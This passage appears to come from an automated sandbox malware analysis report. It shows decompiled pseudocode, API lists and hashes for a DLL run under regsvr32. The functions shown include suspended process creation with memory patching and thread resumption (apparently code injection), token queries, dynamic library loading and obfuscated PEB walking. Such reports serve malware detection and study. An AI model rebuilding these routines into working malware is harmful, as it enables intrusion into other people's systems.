									if(_t61 != 0) {
										_push(0xea60);
										_push(_t85);
										if( *((intOrPtr*)(_t62 + 0x2c))() == 0) {
											_t65 = _t65 + 1;
										}
										_t62 =  *0x1001e684; // 0x19afaa0
									}
									CloseHandle(_t85);
								}
							}
						}
						if(_v40 != 0) {
							if(_t65 == 0) {
								_t52 =  *0x1001e684; // 0x19afaa0
								 *((intOrPtr*)(_t52 + 0x104))(_v40, _t65);
							}
							_t48 =  *0x1001e684; // 0x19afaa0
							 *((intOrPtr*)(_t48 + 0x30))(_v36);
							_t50 =  *0x1001e684; // 0x19afaa0
							 *((intOrPtr*)(_t50 + 0x30))(_v40);
						}
						_t68 = _v16;
						_t47 = _v12 + 1;
						_v12 = _t47;
						if(_t47 < 2) {
							continue;
						} else {
							break;
						}
					}
					_t82 = _v8;
					_t68 = _t68 + 1;
					_v16 = _t68;
					if(_t68 < _t82) {
						continue;
					} else {
						break;
					}
					do {
						goto L19;
					} while (_t82 != 0);
					goto L20;
				}
				L19:
				E1000861A(_t86, 0xfffffffe);
				_t86 = _t86 + 4;
				_t82 = _t82 - 1;
			}



























                            0x1000ca2b
                            0x1000ca34
                            0x1000ca37
                            0x1000ca39
                            0x1000ca3e
                            0x1000ca40
                            0x1000ca43
                            0x1000ca45
                            0x1000cb76
                            0x1000cb76
                            0x1000ca4b
                            0x1000ca5d
                            0x1000ca62
                            0x1000ca65
                            0x1000ca67
                            0x1000ca6c
                            0x1000cb63
                            0x1000cb69
                            0x00000000
                            0x1000cb72
                            0x1000ca72
                            0x1000ca7d
                            0x1000ca8a
                            0x1000ca8e
                            0x1000ca8f
                            0x1000ca90
                            0x1000ca94
                            0x1000ca99
                            0x1000ca9b
                            0x1000caa8
                            0x1000cab0
                            0x1000cabb
                            0x1000cac6
                            0x1000caca
                            0x1000cacc
                            0x1000cada
                            0x1000cae2
                            0x1000cae7
                            0x1000cae9
                            0x1000caee
                            0x1000caf4
                            0x1000caf6
                            0x1000caf6
                            0x1000caf7
                            0x1000caf7
                            0x1000cafd
                            0x1000cafd
                            0x1000caca
                            0x1000cab0
                            0x1000cb04
                            0x1000cb08
                            0x1000cb0a
                            0x1000cb13
                            0x1000cb13
                            0x1000cb19
                            0x1000cb21
                            0x1000cb24
                            0x1000cb2c
                            0x1000cb2c
                            0x1000cb32
                            0x1000cb35
                            0x1000cb36
                            0x1000cb3c
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x1000cb3c
                            0x1000cb42
                            0x1000cb45
                            0x1000cb46
                            0x1000cb4b
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x1000cb51
                            0x00000000
                            0x00000000
                            0x00000000
                            0x1000cb51
                            0x1000cb51
                            0x1000cb54
                            0x1000cb5a
                            0x1000cb5e

                            APIs
                              • Part of subcall function 1000AE66: memset.MSVCRT ref: 1000AE85
                              • Part of subcall function 1000AE66: CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,00000000,00000000), ref: 1000AEA5
                              • Part of subcall function 1000CB77: memset.MSVCRT ref: 1000CBB8
                              • Part of subcall function 1000CB77: NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 1000CC22
                              • Part of subcall function 1000CB77: NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 1000CC3F
                              • Part of subcall function 1000CB77: NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 1000CC60
                              • Part of subcall function 1000CB77: FreeLibrary.KERNEL32(00000000,?,00000000,00000000), ref: 1000CC73
                            • GetLastError.KERNEL32(?,00000001), ref: 1000CACC
                            • ResumeThread.KERNEL32(?,?,00000001), ref: 1000CADA
                            • CloseHandle.KERNEL32(00000000,?,00000001), ref: 1000CAFD
                            Memory Dump Source
                            • Source File: 0000000D.00000002.624165771.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 0000000D.00000002.624156732.0000000010000000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: MemoryVirtual$Protectmemset$CloseCreateErrorFreeHandleLastLibraryProcessResumeThreadWrite
                            • String ID:
                            • API String ID: 1274669455-0
                            • Opcode ID: fa01402cc64924efbc228351cece4e0558249ade2dca9af57fb62686f16e4da8
                            • Instruction ID: 8d942f140de3fd5d428a133cfbe882c53197cdce90259c44b1bbe97365db357f
                            • Opcode Fuzzy Hash: fa01402cc64924efbc228351cece4e0558249ade2dca9af57fb62686f16e4da8
                            • Instruction Fuzzy Hash: AF417E31A00319AFEB01DFA8C985EAE77F9FF58390F124168F501E7265DB30AE058B51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 1000B998, Relevance: 4.6, APIs: 3, Instructions: 54COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 467 1000b998-1000b9b8 GetTokenInformation 468 1000b9ba-1000b9c3 GetLastError 467->468 469 1000b9fe 467->469 468->469 471 1000b9c5-1000b9d5 call 10008604 468->471 470 1000ba00-1000ba04 469->470 474 1000b9d7-1000b9d9 471->474 475 1000b9db-1000b9ee GetTokenInformation 471->475 474->470 475->469 476 1000b9f0-1000b9fc call 1000861a 475->476 476->474
                            C-Code - Quality: 86%
                            			E1000B998(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
				long _v8;
				void* _v12;
				void* _t12;
				void* _t20;
				void* _t22;
				union _TOKEN_INFORMATION_CLASS _t28;
				void* _t31;

				_push(_t22);
				_push(_t22);
				_t31 = 0;
				_t28 = __edx;
				_t20 = _t22;
				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
					L6:
					_t12 = _t31;
				} else {
					_t31 = E10008604(_v8);
					_v12 = _t31;
					if(_t31 != 0) {
						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
							goto L6;
						} else {
							E1000861A( &_v12, _t16);
							goto L3;
						}
					} else {
						L3:
						_t12 = 0;
					}
				}
				return _t12;
			}










                            0x1000b99b
                            0x1000b99c
                            0x1000b9a3
                            0x1000b9ab
                            0x1000b9af
                            0x1000b9b8
                            0x1000b9fe
                            0x1000b9fe
                            0x1000b9c5
                            0x1000b9cd
                            0x1000b9cf
                            0x1000b9d5
                            0x1000b9ee
                            0x00000000
                            0x1000b9f0
                            0x1000b9f5
                            0x00000000
                            0x1000b9fb
                            0x1000b9d7
                            0x1000b9d7
                            0x1000b9d7
                            0x1000b9d7
                            0x1000b9d5
                            0x1000ba04

                            APIs
                            • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,74EC17D9,00000000,10000000,00000000,00000000,?,1000BA37,?,00000000,?,1000D0A8), ref: 1000B9B3
                            • GetLastError.KERNEL32(?,1000BA37,?,00000000,?,1000D0A8), ref: 1000B9BA
                              • Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612
                            • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,1000BA37,?,00000000,?,1000D0A8), ref: 1000B9E9
                            Memory Dump Source
                            • Source File: 0000000D.00000002.624165771.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 0000000D.00000002.624156732.0000000010000000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: InformationToken$AllocErrorHeapLast
                            • String ID:
                            • API String ID: 4258577378-0
                            • Opcode ID: 25ca12ee674f2655c61ae174559f6c02d40ec3235ed2cc3a33db728961b5c84c
                            • Instruction ID: 0e837ad5d344672522dd0af1a739acbaf95446ba78b21159f473d30cfb6f5d1d
                            • Opcode Fuzzy Hash: 25ca12ee674f2655c61ae174559f6c02d40ec3235ed2cc3a33db728961b5c84c
                            • Instruction Fuzzy Hash: 8E01A27260066ABFAB24DFA6CC89D8F7FECEB456E17120225F605D3124E630DE00C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 1000AE66, Relevance: 3.0, APIs: 2, Instructions: 46processCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 612 1000ae66-1000aeb3 memset CreateProcessW
                            C-Code - Quality: 47%
                            			E1000AE66(WCHAR* __ecx, struct _PROCESS_INFORMATION* __edx) {
				struct _STARTUPINFOW _v72;
				signed int _t11;
				WCHAR* _t15;
				int _t19;
				struct _PROCESS_INFORMATION* _t20;

				_t20 = __edx;
				_t15 = __ecx;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t19 = 0x44;
				memset( &_v72, 0, _t19);
				_v72.cb = _t19;
				_t11 = CreateProcessW(0, _t15, 0, 0, 0, 4, 0, 0,  &_v72, _t20);
				asm("sbb eax, eax");
				return  ~( ~_t11) - 1;
			}








                            0x1000ae6f
                            0x1000ae75
                            0x1000ae79
                            0x1000ae7a
                            0x1000ae7b
                            0x1000ae7c
                            0x1000ae80
                            0x1000ae85
                            0x1000ae8d
                            0x1000aea5
                            0x1000aeab
                            0x1000aeb3

                            APIs
                            • memset.MSVCRT ref: 1000AE85
                            • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,00000000,00000000), ref: 1000AEA5
                            Memory Dump Source
                            • Source File: 0000000D.00000002.624165771.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 0000000D.00000002.624156732.0000000010000000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateProcessmemset
                            • String ID:
                            • API String ID: 2296119082-0
                            • Opcode ID: 9215398e04c0e1465519a4e0e52a5396276f524f1bd12603e09a1ebda4c409e5
                            • Instruction ID: 8cd7357356a5339f89587e4f6554bd087a86913dd4092c53185382899a550088
                            • Opcode Fuzzy Hash: 9215398e04c0e1465519a4e0e52a5396276f524f1bd12603e09a1ebda4c409e5
                            • Instruction Fuzzy Hash: 63F012F26041187FF760D6ADDC46EBB77ACC789654F104532FA05D6190E560ED058161
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 1000E1BC, Relevance: 3.0, APIs: 2, Instructions: 35libraryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 47%
                            			E1000E1BC(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v8;
				char _t5;
				struct HINSTANCE__* _t7;
				void* _t10;
				void* _t12;
				void* _t22;
				void* _t25;

				_push(__ecx);
				_t12 = __ecx;
				_t22 = __edx;
				_t5 = E100095C7(_a4);
				_t25 = 0;
				_v8 = _t5;
				_push(_t5);
				if(_a4 != 0x7c3) {
					_t7 = LoadLibraryA(); // executed
				} else {
					_t7 = GetModuleHandleA();
				}
				if(_t7 != 0) {
					_t10 = E1000E171(_t12, _t22, _t7); // executed
					_t25 = _t10;
				}
				E100085C2( &_v8);
				return _t25;
			}










                            0x1000e1bf
                            0x1000e1c2
                            0x1000e1c8
                            0x1000e1ca
                            0x1000e1cf
                            0x1000e1d1
                            0x1000e1db
                            0x1000e1dc
                            0x1000e1eb
                            0x1000e1de
                            0x1000e1de
                            0x1000e1de
                            0x1000e1ef
                            0x1000e1f6
                            0x1000e1fc
                            0x1000e1fc
                            0x1000e201
                            0x1000e20c

                            APIs
                            • GetModuleHandleA.KERNEL32(00000000,00000000,00000001,?,1001BA28), ref: 1000E1DE
                            • LoadLibraryA.KERNEL32(00000000,00000000,00000001,?,1001BA28), ref: 1000E1EB
                            Memory Dump Source
                            • Source File: 0000000D.00000002.624165771.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 0000000D.00000002.624156732.0000000010000000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: HandleLibraryLoadModule
                            • String ID:
                            • API String ID: 4133054770-0
                            • Opcode ID: 475ae924f075fca7c4d943cada4b77f08c9b111225325e3c1749fe1895f8c309
                            • Instruction ID: 73ed2ebf8e11191eb6597406948a09e9f6d4d80ef2ff5e7d934a0b04cc0c2bea
                            • Opcode Fuzzy Hash: 475ae924f075fca7c4d943cada4b77f08c9b111225325e3c1749fe1895f8c309
                            • Instruction Fuzzy Hash: 92F08231704254ABE704DB69DC8589EB7EDEB547D1710402AF406E3255DA70DE0087A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 1000CCC0, Relevance: 2.5, APIs: 2, Instructions: 48sleepstringCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E1000CCC0(void* __ecx, intOrPtr _a4, signed int _a8) {
				CHAR* _v8;
				int _t28;
				signed int _t31;
				signed int _t34;
				signed int _t35;
				void* _t38;
				signed int* _t41;

				_t41 = _a8;
				_t31 = 0;
				if(_t41[1] > 0) {
					_t38 = 0;
					do {
						_t3 =  &(_t41[2]); // 0xe6840d8b
						_t34 =  *_t3;
						_t35 = 0;
						_a8 = 0;
						if( *((intOrPtr*)(_t38 + _t34 + 8)) > 0) {
							_v8 = _a4 + 0x24;
							while(1) {
								_t28 = lstrcmpiA(_v8,  *( *((intOrPtr*)(_t38 + _t34 + 0xc)) + _t35 * 4));
								_t14 =  &(_t41[2]); // 0xe6840d8b
								_t34 =  *_t14;
								if(_t28 == 0) {
									break;
								}
								_t35 = _a8 + 1;
								_a8 = _t35;
								if(_t35 <  *((intOrPtr*)(_t34 + _t38 + 8))) {
									continue;
								} else {
								}
								goto L8;
							}
							 *_t41 =  *_t41 |  *(_t34 + _t38);
						}
						L8:
						_t31 = _t31 + 1;
						_t38 = _t38 + 0x10;
						_t20 =  &(_t41[1]); // 0x1374ff85
					} while (_t31 <  *_t20);
				}
				Sleep(0xa);
				return 1;
			}










                            0x1000ccc6
                            0x1000ccc9
                            0x1000ccce
                            0x1000ccd1
                            0x1000ccd3
                            0x1000ccd3
                            0x1000ccd3
                            0x1000ccd6
                            0x1000ccd8
                            0x1000ccdf
                            0x1000cce7
                            0x1000ccea
                            0x1000ccf4
                            0x1000ccfa
                            0x1000ccfa
                            0x1000ccff
                            0x00000000
                            0x00000000
                            0x1000cd04
                            0x1000cd05
                            0x1000cd0c
                            0x00000000
                            0x00000000
                            0x1000cd0e
                            0x00000000
                            0x1000cd0c
                            0x1000cd13
                            0x1000cd13
                            0x1000cd15
                            0x1000cd15
                            0x1000cd16
                            0x1000cd19
                            0x1000cd19
                            0x1000cd1e
                            0x1000cd26
                            0x1000cd32

                            APIs
                            • lstrcmpiA.KERNEL32(?,?,00000128,00000000,?,?,?,1000AC0D,?,?), ref: 1000CCF4
                            • Sleep.KERNEL32(0000000A,00000000,?,?,?,1000AC0D,?,?), ref: 1000CD26
                            Memory Dump Source
                            • Source File: 0000000D.00000002.624165771.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 0000000D.00000002.624156732.0000000010000000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Sleeplstrcmpi
                            • String ID:
                            • API String ID: 1261054337-0
                            • Opcode ID: d589c2e27be55aab14665e750e2f3d45a62fba7c08b0dfb6dc3d34da2db7017b
                            • Instruction ID: cde0d477192250e791ba25b7cb0ca9c4b7eae4faf087914376a22588bee842ac
                            • Opcode Fuzzy Hash: d589c2e27be55aab14665e750e2f3d45a62fba7c08b0dfb6dc3d34da2db7017b
                            • Instruction Fuzzy Hash: 21018031600709EFEB10DF69C884D5AB7E5FF843A4725C47AE95A8B215D730E942DB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 10005E96, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E10005E96() {
				intOrPtr _t3;

				_t3 =  *0x1001e684; // 0x19afaa0
				 *((intOrPtr*)(_t3 + 0x2c))( *0x1001e6a8, 0xffffffff);
				ExitProcess(0);
			}




                            0x10005e96
                            0x10005ea3
                            0x10005ead

                            APIs
                            • ExitProcess.KERNEL32(00000000), ref: 10005EAD
                            Memory Dump Source
                            • Source File: 0000000D.00000002.624165771.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 0000000D.00000002.624156732.0000000010000000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess
                            • String ID:
                            • API String ID: 621844428-0
                            • Opcode ID: 5cd9b7efdf0ac82a49e6ca76f2220a9fceff99eff54594cf8359571d6987a725
                            • Instruction ID: 9fe5a48d1d7df1d44c8ff89900a8b99800cce3c20b8b2062506d45ae6f81fc06
                            • Opcode Fuzzy Hash: 5cd9b7efdf0ac82a49e6ca76f2220a9fceff99eff54594cf8359571d6987a725
                            • Instruction Fuzzy Hash: D4C002712151A1AFEA409BA4CD88F0877A1AB68362F9282A5F5259A1F6CA30D8009B11
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 100085EF, Relevance: 1.5, APIs: 1, Instructions: 6memoryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E100085EF() {
				void* _t1;

				_t1 = HeapCreate(0, 0x80000, 0); // executed
				 *0x1001e768 = _t1;
				return _t1;
			}




                            0x100085f8
                            0x100085fe
                            0x10008603

                            APIs
                            • HeapCreate.KERNEL32(00000000,00080000,00000000,10005FA7), ref: 100085F8
                            Memory Dump Source
                            • Source File: 0000000D.00000002.624165771.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 0000000D.00000002.624156732.0000000010000000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateHeap
                            • String ID:
                            • API String ID: 10892065-0
                            • Opcode ID: 21e30d703b760380db77e66f3654ad7d37bd304b680c7c4cfdef8daab914962f
                            • Instruction ID: f703af9baad619bee9f37dfa55c6143b3da77678d96310d0b12c6411cce6613a
                            • Opcode Fuzzy Hash: 21e30d703b760380db77e66f3654ad7d37bd304b680c7c4cfdef8daab914962f
                            • Instruction Fuzzy Hash: B9B012B0A8471096F2901B204C86B047550A308B0AF308001F708581D0C6B05104CB14
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Non-executed Functions

                            Function 00784495, Relevance: .1, Instructions: 140COMMONCrypto
                            Download Yara Rule
                            C-Code - Quality: 60%
                            			E00784495(signed int __eax, signed int __ebx, signed int __ecx, signed int __edx, signed int __edi, signed int __esi) {
				signed int _v8;
				signed int _t62;
				signed int _t67;
				signed int _t68;
				signed int _t70;
				signed int _t72;
				signed int _t74;
				signed int _t80;
				signed int _t84;
				signed int _t91;
				signed int _t102;
				signed int _t104;
				signed int _t114;
				signed int _t116;
				void* _t121;
				void* _t143;
				signed int* _t147;

				_push(__ecx);
				_push(__edx);
				_push(__edi);
				_push(__esi);
				if( *((intOrPtr*)(__ebx + 0x435571)) != 1) {
					_v8 = __esi;
					_t114 = __edi & 0x00000000 ^ (__esi & 0x00000000 |  *(__ebx + 0x43574e));
					_push(__edx);
					_t62 = __eax & 0x00000000 | __edx & 0x00000000 |  *(_t114 + 0x3c);
					_pop(_t102);
					_t116 =  *((intOrPtr*)(_t62 + _t114 + 0x28)) +  *(__ebx + 0x4350b0);
					_v8 = __ecx;
					_t104 = _t102 & 0x00000000 ^ (__ecx ^ _v8 | _t116);
					_t84 = _v8;
					_v8 = _t84;
					_t118 = _t116 & 0x00000000 | _t84 ^ _v8 |  *(__ebx + 0x4350b0);
					_push(_t143);
					_v8 = __ebx;
					_t80 = _v8;
					_v8 =  *((intOrPtr*)((_t62 & 0x00000000 ^ (_t143 -  *_t147 |  *((_t116 & 0x00000000 | _t84 ^ _v8 |  *(__ebx + 0x4350b0)) + 0x3c))) + _t118 + 0x28)) +  *(__ebx + 0x4350b0);
					_t67 = 0 ^  *( *((intOrPtr*)((_v8 & 0x00000000 | __ebx & 0x00000000 |  *[fs:0x30]) + 0xc)) + 0xc);
					__eflags = _t67;
					_t91 = _t67;
					_t68 = _v8;
					while(1) {
						 *_t35 =  *((intOrPtr*)(_t91 + 0x1c));
						_push(_v8);
						_pop(_t121);
						__eflags = _t68 - _t121;
						if(_t68 == _t121) {
							break;
						}
						__eflags = _t104 - _t121;
						if(__eflags != 0) {
							_t91 =  *(_t91 + 4);
							if(__eflags != 0) {
								continue;
							} else {
								 *((intOrPtr*)(_t80 + 0x435571)) = 1;
								_pop( *_t52);
								_pop( *_t54);
								_pop( *_t56);
								_t70 =  *_t147;
								__eflags = _t70;
								return _t70;
							}
						} else {
							_pop( *_t44);
							_pop( *_t46);
							_t72 = (_t68 & 0x00000000) + _v8;
							__eflags = _t72;
							return _t72;
						}
						goto L9;
					}
					 *_t37 = _t104;
					_push(_v8);
					_pop( *_t39);
					_pop( *_t40);
					_t74 = _t68 & 0x00000000 | _v8;
					__eflags = _t74;
					return _t74;
				} else {
					_pop( *_t2);
					_pop( *_t4);
					return (__eax & 0x00000000) + _t147[1];
				}
				L9:
			}




















                            0x0078449c
                            0x0078449d
                            0x0078449e
                            0x0078449f
                            0x007844a7
                            0x007844e1
                            0x007844f0
                            0x007844f5
                            0x007844ff
                            0x00784501
                            0x00784506
                            0x0078450c
                            0x00784517
                            0x00784519
                            0x0078451c
                            0x0078452b
                            0x00784530
                            0x00784553
                            0x00784565
                            0x0078456b
                            0x00784570
                            0x00784570
                            0x00784573
                            0x00784575
                            0x00784578
                            0x0078457b
                            0x0078457e
                            0x00784581
                            0x00784582
                            0x00784584
                            0x00000000
                            0x00000000
                            0x007845cc
                            0x007845ce
                            0x00784602
                            0x00784605
                            0x00000000
                            0x0078460b
                            0x0078460b
                            0x00784617
                            0x0078461d
                            0x00784623
                            0x00784631
                            0x00784631
                            0x00784638
                            0x00784638
                            0x007845d0
                            0x007845d0
                            0x007845e4
                            0x007845fb
                            0x007845fb
                            0x007845ff
                            0x007845ff
                            0x00000000
                            0x007845ce
                            0x00784587
                            0x0078458a
                            0x0078458d
                            0x007845b6
                            0x007845c5
                            0x007845c5
                            0x007845c9
                            0x007844a9
                            0x007844af
                            0x007844c3
                            0x007844de
                            0x007844de
                            0x00000000

                            Memory Dump Source
                            • Source File: 0000000D.00000002.622781002.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_780000_regsvr32.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0479555227218ebb414e8c4145d25bc2b41eb189c0fbb9efb8d710e990c1ccf4
                            • Instruction ID: 79efaf66f0995a7c49e2e57df582f5de50c85a1e2f0d7bce4a023dbd1b3a5b5d
                            • Opcode Fuzzy Hash: 0479555227218ebb414e8c4145d25bc2b41eb189c0fbb9efb8d710e990c1ccf4
                            • Instruction Fuzzy Hash: 88512A77D11508EBEB04CF94DA4279DB7B2FF94324F2981A9C845A7280C734AF20EB95
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 1000DB3C, Relevance: 24.9, APIs: 12, Strings: 2, Instructions: 388memoryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 50%
                            			E1000DB3C(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				void* _v28;
				signed int _v32;
				char _v36;
				intOrPtr _v40;
				signed int _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				signed int _v60;
				char* _v72;
				signed short _v80;
				signed int _v84;
				char _v88;
				char _v92;
				char _v96;
				intOrPtr _v100;
				char _v104;
				char _v616;
				intOrPtr* _t159;
				char _t165;
				signed int _t166;
				signed int _t173;
				signed int _t178;
				signed int _t186;
				intOrPtr* _t187;
				signed int _t188;
				signed int _t192;
				intOrPtr* _t193;
				intOrPtr _t200;
				intOrPtr* _t205;
				signed int _t207;
				signed int _t209;
				intOrPtr* _t210;
				intOrPtr _t212;
				intOrPtr* _t213;
				signed int _t214;
				char _t217;
				signed int _t218;
				signed int _t219;
				signed int _t230;
				signed int _t235;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				intOrPtr* _t247;
				intOrPtr* _t251;
				signed int _t252;
				intOrPtr* _t253;
				void* _t255;
				intOrPtr* _t261;
				signed int _t262;
				signed int _t283;
				signed int _t289;
				char* _t298;
				void* _t320;
				signed int _t322;
				intOrPtr* _t323;
				intOrPtr _t324;
				signed int _t327;
				intOrPtr* _t328;
				intOrPtr* _t329;

				_v32 = _v32 & 0x00000000;
				_v60 = _v60 & 0x00000000;
				_v56 = __edx;
				_v100 = __ecx;
				_t159 = E1000D523(__ecx);
				_t251 = _t159;
				_v104 = _t251;
				if(_t251 == 0) {
					return _t159;
				}
				_t320 = E10008604(0x10);
				_v36 = _t320;
				_pop(_t255);
				if(_t320 == 0) {
					L53:
					E1000861A( &_v60, 0xfffffffe);
					E1000D5D7( &_v104);
					return _t320;
				}
				_t165 = E100095E1(_t255, 0x536);
				 *_t328 = 0x609;
				_v52 = _t165;
				_t166 = E100095E1(_t255);
				_push(0);
				_push(_v56);
				_v20 = _t166;
				_push(_t166);
				_push(_a4);
				_t322 = E100092E5(_t165);
				_v60 = _t322;
				E100085D5( &_v52);
				E100085D5( &_v20);
				_t329 = _t328 + 0x20;
				if(_t322 != 0) {
					_t323 = __imp__#2;
					_v40 =  *_t323(_t322);
					_t173 = E100095E1(_t255, 0x9e4);
					_v20 = _t173;
					_v52 =  *_t323(_t173);
					E100085D5( &_v20);
					_t324 = _v40;
					_t261 =  *_t251;
					_t252 = 0;
					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
					__eflags = _t178;
					if(_t178 != 0) {
						L52:
						__imp__#6(_t324);
						__imp__#6(_v52);
						goto L53;
					}
					_t262 = _v32;
					_v28 = 0;
					_v20 = 0;
					__eflags = _t262;
					if(_t262 == 0) {
						L49:
						 *((intOrPtr*)( *_t262 + 8))(_t262);
						__eflags = _t252;
						if(_t252 == 0) {
							E1000861A( &_v36, 0);
							_t320 = _v36;
						} else {
							 *(_t320 + 8) = _t252;
							 *_t320 = E100091E3(_v100);
							 *((intOrPtr*)(_t320 + 4)) = E100091E3(_v56);
						}
						goto L52;
					} else {
						goto L6;
					}
					while(1) {
						L6:
						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
						__eflags = _t186;
						if(_t186 != 0) {
							break;
						}
						_v16 = 0;
						_v48 = 0;
						_v12 = 0;
						_v24 = 0;
						__eflags = _v84;
						if(_v84 == 0) {
							break;
						}
						_t187 = _v28;
						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
						__eflags = _t188;
						if(_t188 >= 0) {
							__imp__#20(_v24, 1,  &_v16);
							__imp__#19(_v24, 1,  &_v48);
							_t46 = _t320 + 0xc; // 0xc
							_t253 = _t46;
							_t327 = _t252 << 3;
							_t47 = _t327 + 8; // 0x8
							_t192 = E10008698(_t327, _t47);
							__eflags = _t192;
							if(_t192 == 0) {
								__imp__#16(_v24);
								_t193 = _v28;
								 *((intOrPtr*)( *_t193 + 8))(_t193);
								L46:
								_t252 = _v20;
								break;
							}
							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E10008604( *(_t327 +  *_t253) << 3);
							_t200 =  *_t253;
							__eflags =  *(_t327 + _t200 + 4);
							if( *(_t327 + _t200 + 4) == 0) {
								_t136 = _t320 + 0xc; // 0xc
								E1000861A(_t136, 0);
								E1000861A( &_v36, 0);
								__imp__#16(_v24);
								_t205 = _v28;
								 *((intOrPtr*)( *_t205 + 8))(_t205);
								_t320 = _v36;
								goto L46;
							}
							_t207 = _v16;
							while(1) {
								_v12 = _t207;
								__eflags = _t207 - _v48;
								if(_t207 > _v48) {
									break;
								}
								_v44 = _v44 & 0x00000000;
								_t209 =  &_v12;
								__imp__#25(_v24, _t209,  &_v44);
								__eflags = _t209;
								if(_t209 < 0) {
									break;
								}
								_t212 = E100091E3(_v44);
								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
								_t213 = _v28;
								_t281 =  *_t213;
								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
								__eflags = _t214;
								if(_t214 < 0) {
									L39:
									__imp__#6(_v44);
									_t207 = _v12 + 1;
									__eflags = _t207;
									continue;
								}
								_v92 = E100095E1(_t281, 0x250);
								 *_t329 = 0x4cc;
								_t217 = E100095E1(_t281);
								_t283 = _v80;
								_v96 = _t217;
								_t218 = _t283 & 0x0000ffff;
								__eflags = _t218 - 0xb;
								if(__eflags > 0) {
									_t219 = _t218 - 0x10;
									__eflags = _t219;
									if(_t219 == 0) {
										L35:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E10008604(0x18);
